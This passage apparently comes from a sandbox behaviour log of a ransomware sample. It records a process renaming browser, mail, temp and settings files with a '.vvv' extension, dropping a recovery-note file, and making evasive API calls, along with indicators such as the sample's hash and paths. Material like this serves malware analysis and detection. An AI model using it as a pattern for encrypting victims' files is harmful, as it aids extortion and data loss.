- CreateOptions: 0x0
- file:
- timestamp: 191930
- mode: rename
- sequenceNumber: 2545
- filesize: 6350
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\128.png
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\128.png.vvv
- ads:
- fid (ads:): 1125899906928873
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 192338
- mode: rename
- sequenceNumber: 2546
- filesize: 6334
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\brndlog.txt
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.vvv
- ads:
- fid (ads:): 2533274790471192
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 192510
- repeat: 20000
- mode: created
- sequenceNumber: 2547
- value: C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953540965
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 192689
- mode: rename
- sequenceNumber: 2548
- filesize: 121710
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\22NAGU7G\contentHXS[1].js
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\22NAGU7G\contentHXS[1].js.vvv
- ads:
- fid (ads:): 1125899906859502
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 192733
- mode: rename
- sequenceNumber: 2549
- filesize: 766
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AOS51X5J\ontrtl[1].css
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AOS51X5J\ontrtl[1].css.vvv
- ads:
- fid (ads:): 1125899906917511
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 192766
- mode: rename
- sequenceNumber: 2550
- filesize: 2542
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AOS51X5J\script[1].js
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AOS51X5J\script[1].js.vvv
- ads:
- fid (ads:): 1125899906859501
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 192815
- mode: rename
- sequenceNumber: 2551
- filesize: 6110
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\J3KBCJOQ\ont[1].css
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\J3KBCJOQ\ont[1].css.vvv
- ads:
- fid (ads:): 844424930150203
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 192865
- mode: rename
- sequenceNumber: 2552
- filesize: 39550
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SFKZXRFL\contentHXS[1].css
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SFKZXRFL\contentHXS[1].css.vvv
- ads:
- fid (ads:): 1125899906859503
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 193589
- mode: rename
- sequenceNumber: 2553
- filesize: 1502
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.vvv
- ads:
- fid (ads:): 562949953439260
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 193689
- mode: rename
- sequenceNumber: 2554
- filesize: 2990
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg.vvv
- ads:
- fid (ads:): 562949953439262
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 193778
- mode: rename
- sequenceNumber: 2555
- filesize: 24286
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.vvv
- ads:
- fid (ads:): 562949953439456
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 193845
- mode: rename
- sequenceNumber: 2556
- filesize: 6830
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.vvv
- ads:
- fid (ads:): 562949953439571
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 193938
- mode: rename
- sequenceNumber: 2557
- filesize: 4638
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.vvv
- ads:
- fid (ads:): 562949953439798
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 193990
- mode: rename
- sequenceNumber: 2558
- filesize: 2638
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Monet.jpg
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Monet.jpg.vvv
- ads:
- fid (ads:): 562949953439802
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 194005
- mode: rename
- sequenceNumber: 2559
- filesize: 3374
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Notebook.jpg
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Notebook.jpg.vvv
- ads:
- fid (ads:): 562949953439880
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 194032
- mode: rename
- sequenceNumber: 2560
- filesize: 6798
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.vvv
- ads:
- fid (ads:): 562949953439884
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 194044
- mode: rename
- sequenceNumber: 2561
- filesize: 5534
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.vvv
- ads:
- fid (ads:): 562949953439889
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 194056
- mode: rename
- sequenceNumber: 2562
- filesize: 4398
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg.vvv
- ads:
- fid (ads:): 562949953439891
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 194070
- mode: rename
- sequenceNumber: 2563
- filesize: 5534
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg.vvv
- ads:
- fid (ads:): 562949953439893
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 194099
- mode: rename
- sequenceNumber: 2564
- filesize: 14478
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Psychedelic.jpg
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Psychedelic.jpg.vvv
- ads:
- fid (ads:): 562949953439895
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 194168
- mode: rename
- sequenceNumber: 2565
- filesize: 2350
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.vvv
- ads:
- fid (ads:): 562949953439968
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 194432
- mode: rename
- sequenceNumber: 2566
- filesize: 16206
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg.vvv
- ads:
- fid (ads:): 562949953440330
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 194481
- mode: rename
- sequenceNumber: 2567
- filesize: 5150
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.vvv
- ads:
- fid (ads:): 562949953441253
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 194516
- mode: rename
- sequenceNumber: 2568
- filesize: 2414
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Small_News.jpg
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Small_News.jpg.vvv
- ads:
- fid (ads:): 562949953441259
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 194549
- mode: rename
- sequenceNumber: 2569
- filesize: 10990
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.vvv
- ads:
- fid (ads:): 562949953441712
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 194584
- mode: rename
- sequenceNumber: 2570
- filesize: 7934
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.vvv
- ads:
- fid (ads:): 562949953441916
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 194608
- mode: rename
- sequenceNumber: 2571
- filesize: 4078
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Tanspecks.jpg
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Tanspecks.jpg.vvv
- ads:
- fid (ads:): 844424930152587
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 194639
- mode: rename
- sequenceNumber: 2572
- filesize: 3598
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg
- new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg.vvv
- ads:
- fid (ads:): 562949953441949
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 194893
- mode: rename
- sequenceNumber: 2573
- filesize: 782
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Temp\AUCHECK_PARSER.txt
- new_name: C:\Users\Administrator\AppData\Local\Temp\AUCHECK_PARSER.txt.vvv
- ads:
- fid (ads:): 562949953509057
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 194927
- mode: rename
- sequenceNumber: 2574
- filesize: 1550
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Temp\dd_dotNetFx4_5_2_Full_x86_x64_decompression_log.txt
- new_name: C:\Users\Administrator\AppData\Local\Temp\dd_dotNetFx4_5_2_Full_x86_x64_decompression_log.txt.vvv
- ads:
- fid (ads:): 1970324837066728
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 194960
- mode: rename
- sequenceNumber: 2575
- filesize: 2174
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Temp\dd_SetupUtility.txt
- new_name: C:\Users\Administrator\AppData\Local\Temp\dd_SetupUtility.txt.vvv
- ads:
- fid (ads:): 844424930224374
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 195468
- mode: rename
- sequenceNumber: 2576
- filesize: 412286
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Temp\dd_vcredistMSI1219.txt
- new_name: C:\Users\Administrator\AppData\Local\Temp\dd_vcredistMSI1219.txt.vvv
- ads:
- fid (ads:): 844424930148838
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 195729
- mode: rename
- sequenceNumber: 2577
- filesize: 363934
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Temp\dd_vcredistMSI307A.txt
- new_name: C:\Users\Administrator\AppData\Local\Temp\dd_vcredistMSI307A.txt.vvv
- ads:
- fid (ads:): 1125899906923633
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 195872
- mode: rename
- sequenceNumber: 2578
- filesize: 425006
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Temp\dd_vcredistMSI53BC.txt
- new_name: C:\Users\Administrator\AppData\Local\Temp\dd_vcredistMSI53BC.txt.vvv
- ads:
- fid (ads:): 844424930230594
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 195903
- mode: rename
- sequenceNumber: 2579
- filesize: 11870
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Temp\dd_vcredistUI1219.txt
- new_name: C:\Users\Administrator\AppData\Local\Temp\dd_vcredistUI1219.txt.vvv
- ads:
- fid (ads:): 844424930148837
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 195946
- mode: rename
- sequenceNumber: 2580
- filesize: 11598
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Temp\dd_vcredistUI307A.txt
- new_name: C:\Users\Administrator\AppData\Local\Temp\dd_vcredistUI307A.txt.vvv
- ads:
- fid (ads:): 844424930212976
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 196002
- mode: rename
- sequenceNumber: 2581
- filesize: 11838
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Temp\dd_vcredistUI53BC.txt
- new_name: C:\Users\Administrator\AppData\Local\Temp\dd_vcredistUI53BC.txt.vvv
- ads:
- fid (ads:): 844424930230593
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 196061
- mode: rename
- sequenceNumber: 2582
- filesize: 7438
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Temp\dd_wcf_CA_smci_20150619_183318_999.txt
- new_name: C:\Users\Administrator\AppData\Local\Temp\dd_wcf_CA_smci_20150619_183318_999.txt.vvv
- ads:
- fid (ads:): 562949953516584
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 196268
- mode: rename
- sequenceNumber: 2583
- filesize: 3118
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Temp\dd_wcf_CA_smci_20150619_183320_091.txt
- new_name: C:\Users\Administrator\AppData\Local\Temp\dd_wcf_CA_smci_20150619_183320_091.txt.vvv
- ads:
- fid (ads:): 562949953516587
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 196407
- mode: rename
- sequenceNumber: 2584
- filesize: 34158
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Temp\hXWBxMP.jpg
- new_name: C:\Users\Administrator\AppData\Local\Temp\hXWBxMP.jpg.vvv
- ads:
- fid (ads:): 562949953520896
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 196445
- mode: rename
- sequenceNumber: 2585
- filesize: 14254
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Temp\kkAoJmdjG.xls
- new_name: C:\Users\Administrator\AppData\Local\Temp\kkAoJmdjG.xls.vvv
- ads:
- fid (ads:): 562949953520894
- ntstatus: 0x0
- CreateOptions: 0x0
- high_cpu:
- timestamp: 198100
- sequenceNumber: 2586
- total_cpu: 77.272581585081596
- processinfo:
- tainted: true
- pid: 2312
- process_cpu: 77.272581585081596
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 198393
- repeat: 50000
- sequenceNumber: 2587
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- process:
- timestamp: 198540
- mode: opened
- sequenceNumber: 2588
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 4
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 198866
- mode: rename
- sequenceNumber: 2589
- filesize: 10565150
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Temp\Microsoft .NET Framework 4.5.2 Setup_20150619_113235616-MSI_netfx_Full_GDR_x64.msi.txt
- new_name: C:\Users\Administrator\AppData\Local\Temp\Microsoft .NET Framework 4.5.2 Setup_20150619_113235616-MSI_netfx_Full_GDR_x64.msi.txt.vvv
- ads:
- fid (ads:): 5066549580793238
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 199204
- mode: rename
- sequenceNumber: 2590
- filesize: 272622
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Temp\Microsoft Visual C++ 2010 x64 Redistributable Setup_20150619_114629030-MSI_vc_red.msi.txt
- new_name: C:\Users\Administrator\AppData\Local\Temp\Microsoft Visual C++ 2010 x64 Redistributable Setup_20150619_114629030-MSI_vc_red.msi.txt.vvv
- ads:
- fid (ads:): 844424930230714
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 199412
- mode: rename
- sequenceNumber: 2591
- filesize: 287774
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_20150619_114555646-MSI_vc_red.msi.txt
- new_name: C:\Users\Administrator\AppData\Local\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_20150619_114555646-MSI_vc_red.msi.txt.vvv
- ads:
- fid (ads:): 562949953520054
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 199511
- mode: rename
- sequenceNumber: 2592
- filesize: 4414
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Temp\ruI_Qihqo.doc
- new_name: C:\Users\Administrator\AppData\Local\Temp\ruI_Qihqo.doc.vvv
- ads:
- fid (ads:): 562949953520893
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 199857
- mode: rename
- sequenceNumber: 2593
- filesize: 990
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Roaming\Adobe\Acrobat\10.0\TMGrpPrm.sav
- new_name: C:\Users\Administrator\AppData\Roaming\Adobe\Acrobat\10.0\TMGrpPrm.sav.vvv
- ads:
- fid (ads:): 562949953520741
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 199920
- mode: rename
- sequenceNumber: 2594
- filesize: 462
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Roaming\Adobe\Acrobat\11.0\TMDocs.sav
- new_name: C:\Users\Administrator\AppData\Roaming\Adobe\Acrobat\11.0\TMDocs.sav.vvv
- ads:
- fid (ads:): 9288674231548761
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 199933
- mode: rename
- sequenceNumber: 2595
- filesize: 990
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Roaming\Adobe\Acrobat\11.0\TMGrpPrm.sav
- new_name: C:\Users\Administrator\AppData\Roaming\Adobe\Acrobat\11.0\TMGrpPrm.sav.vvv
- ads:
- fid (ads:): 1125899906939733
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 199966
- mode: rename
- sequenceNumber: 2596
- filesize: 990
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Roaming\Adobe\Acrobat\9.0\TMGrpPrm.sav
- new_name: C:\Users\Administrator\AppData\Roaming\Adobe\Acrobat\9.0\TMGrpPrm.sav.vvv
- ads:
- fid (ads:): 562949953520740
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 200450
- mode: rename
- sequenceNumber: 2597
- filesize: 643406
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
- new_name: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg.vvv
- ads:
- fid (ads:): 2251799813701303
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 200518
- mode: rename
- sequenceNumber: 2598
- filesize: 574
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\g7sfg8u4.hh3fwg7c.default\cookies.txt
- new_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\g7sfg8u4.hh3fwg7c.default\cookies.txt.vvv
- ads:
- fid (ads:): 562949953520726
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 200584
- mode: rename
- sequenceNumber: 2599
- filesize: 8766
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\g7sfg8u4.hh3fwg7c.default\prefs.js
